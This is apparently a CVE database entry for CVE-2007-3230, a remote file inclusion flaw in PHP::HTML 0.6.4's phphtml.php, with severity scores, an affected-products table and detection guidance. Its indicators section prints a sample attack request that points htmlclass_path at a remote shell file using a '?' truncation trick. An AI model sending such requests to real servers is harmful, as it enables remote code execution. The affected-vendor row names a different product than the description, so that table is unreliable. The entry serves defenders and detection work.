cbcvebase.
CVE-2007-3230
published 2007-06-14

CVE-2007-3230: PHP remote file inclusion vulnerability in phphtml.php in Idan Sofer PHP::HTML 0.6.4 allows remote attackers to execute arbitrary PHP code via a URL in the…

PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
67.86%
99.2th percentile
PHP remote file inclusion vulnerability in phphtml.php in Idan Sofer PHP::HTML 0.6.4 allows remote attackers to execute arbitrary PHP code via a URL in the htmlclass_path parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
simian_systems_incsitellite

Detection & IOCsextracted from sources · hover to see the quote

urlxxx.com\path\phphtml.php?htmlclass_path=SH3ll.txt?
pathPATH\phphtml.php
  • Monitor HTTP requests to phphtml.php containing a URL or remote path in the 'htmlclass_path' parameter, which is the injection point for remote file inclusion.
  • Look for requests where 'htmlclass_path' parameter value ends with a null-byte or '?' terminator (e.g., 'SH3ll.txt?') — a classic RFI technique to truncate the appended file extension.
  • ·Vulnerability is specific to PHP::HTML version 0.6.4 only; the RFI exists on line 19 of phphtml.php.

CVSS provenance

nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.